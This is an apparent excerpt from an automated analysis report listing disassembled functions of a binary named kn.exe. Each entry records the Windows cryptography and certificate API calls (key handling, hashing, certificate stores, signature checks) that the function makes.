        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,9_2_00007FF607FF0ABC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,9_2_00007FF607FF2AE4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F92B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,9_2_00007FF607F92B00
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF607FE8AFC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,9_2_00007FF60805EB38
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,9_2_00007FF607FF0B80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,9_2_00007FF607F7CB98
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,9_2_00007FF60801CBB4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608020B9C CryptHashData,GetLastError,#357,9_2_00007FF608020B9C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF2BC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608020BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,9_2_00007FF608020BF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,9_2_00007FF607F8CC24
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026C30 NCryptOpenStorageProvider,#360,9_2_00007FF608026C30
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0C3C NCryptExportKey,#205,#359,#359,#357,9_2_00007FF607FF0C3C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F56C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,9_2_00007FF607F56C4C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,9_2_00007FF608028C58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026C88 NCryptEnumAlgorithms,#360,9_2_00007FF608026C88
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,9_2_00007FF607FF2C80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608034C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,9_2_00007FF608034C80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,9_2_00007FF607FE4CA0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,9_2_00007FF607FFACAC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,9_2_00007FF607FB4CC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608048CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,9_2_00007FF608048CF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026CE0 NCryptEnumStorageProviders,#360,9_2_00007FF608026CE0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,9_2_00007FF607FF2CFC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,9_2_00007FF607FE2CF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0D14 NCryptFinalizeKey,#205,#357,#357,9_2_00007FF607FF0D14
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026D2C NCryptFreeBuffer,#360,9_2_00007FF608026D2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF607FB2D18
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0D84 NCryptFreeObject,#205,#357,9_2_00007FF607FF0D84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF607FF2D78
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026D78 NCryptOpenKey,#360,9_2_00007FF608026D78
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608022DAC #357,#357,CryptFindOIDInfo,LocalFree,9_2_00007FF608022DAC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608018DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,9_2_00007FF608018DD0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,9_2_00007FF607FF0DD4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608040DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,9_2_00007FF608040DB8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF607FD4DDC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026DE0 NCryptCreatePersistedKey,#360,9_2_00007FF608026DE0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F80E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F80E24
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026E48 NCryptSetProperty,#360,9_2_00007FF608026E48
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608034E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,9_2_00007FF608034E58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,9_2_00007FF607FF2E6C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF607FC2E7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801EE94 CryptSignMessage,SetLastError,9_2_00007FF60801EE94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F90E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,9_2_00007FF607F90E94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026EA8 NCryptImportKey,#360,9_2_00007FF608026EA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608050ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,9_2_00007FF608050ED0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0EF4 NCryptImportKey,#205,#359,#359,#357,9_2_00007FF607FF0EF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026F2C NCryptExportKey,#360,9_2_00007FF608026F2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F88F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,9_2_00007FF607F88F1C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF607FD4F50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,9_2_00007FF60801EF74
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,9_2_00007FF607FE0F58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F84F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,9_2_00007FF607F84F90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026FAC BCryptOpenAlgorithmProvider,#360,9_2_00007FF608026FAC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0FB4 NCryptOpenKey,#205,#359,#357,#357,9_2_00007FF607FF0FB4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802700C BCryptEnumAlgorithms,#360,9_2_00007FF60802700C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF7020
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF301C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F67034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,9_2_00007FF607F67034
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF607F6302F
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,9_2_00007FF607FE9028
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF1058 NCryptOpenStorageProvider,#205,#359,#357,9_2_00007FF607FF1058
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802705C BCryptGetProperty,#360,9_2_00007FF60802705C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,9_2_00007FF607F9107C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FFB0A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,9_2_00007FF607FBB098
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080270C8 BCryptSetProperty,#360,9_2_00007FF6080270C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF10D8 NCryptSetProperty,#205,#359,#357,#359,#357,9_2_00007FF607FF10D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF607FF30D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,9_2_00007FF607FA9134
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,9_2_00007FF60801511C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027124 BCryptGenerateKeyPair,#360,9_2_00007FF608027124
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805613C CryptDecodeObjectEx,9_2_00007FF60805613C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF607FB417C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF607FD6194
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F921A4 #360,#359,#357,#357,BCryptFreeBuffer,9_2_00007FF607F921A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080161AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,9_2_00007FF6080161AC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,9_2_00007FF607FDA1E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608056214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,9_2_00007FF608056214
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF607FEE1F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,9_2_00007FF60802A1F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF60801E274
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FC6280
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608012278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,9_2_00007FF608012278
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,9_2_00007FF608028298
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,9_2_00007FF60805A2E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F90300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,9_2_00007FF607F90300
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,9_2_00007FF607FE2358
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,9_2_00007FF607FE6374
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7E3B0 #357,#357,CryptDecodeObject,LocalFree,9_2_00007FF607F7E3B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F923E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,9_2_00007FF607F923E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF608028404
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F74410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F74410
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,9_2_00007FF607FCA450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,9_2_00007FF607FCC450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,9_2_00007FF607FE8488
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,9_2_00007FF607FC24D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F644E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F644E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,9_2_00007FF607F7C514
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF60801E516
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,9_2_00007FF60805A58C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF60802A590
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,9_2_00007FF607FEE57C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF65B4 NCryptIsKeyHandle,_CxxThrowException,9_2_00007FF607FF65B4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,9_2_00007FF607F7C5D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,9_2_00007FF607FB25E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F78600 #357,CryptDecodeObject,GetLastError,LocalFree,9_2_00007FF607F78600
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F80630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F80630
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026654 NCryptGetProperty,#360,9_2_00007FF608026654
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,9_2_00007FF607FBA654
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,9_2_00007FF607FC4694
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F86694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,9_2_00007FF607F86694
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F926E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,9_2_00007FF607F926E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080266D8 NCryptFreeObject,#360,9_2_00007FF6080266D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080186D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,9_2_00007FF6080186D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE2724 CryptDecodeObject,GetLastError,#357,9_2_00007FF607FE2724
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0740 BCryptCloseAlgorithmProvider,#205,#357,#357,9_2_00007FF607FF0740
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF60802A740
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF07A4 BCryptDestroyHash,#205,#357,9_2_00007FF607FF07A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FE27BC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F567CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F567CC
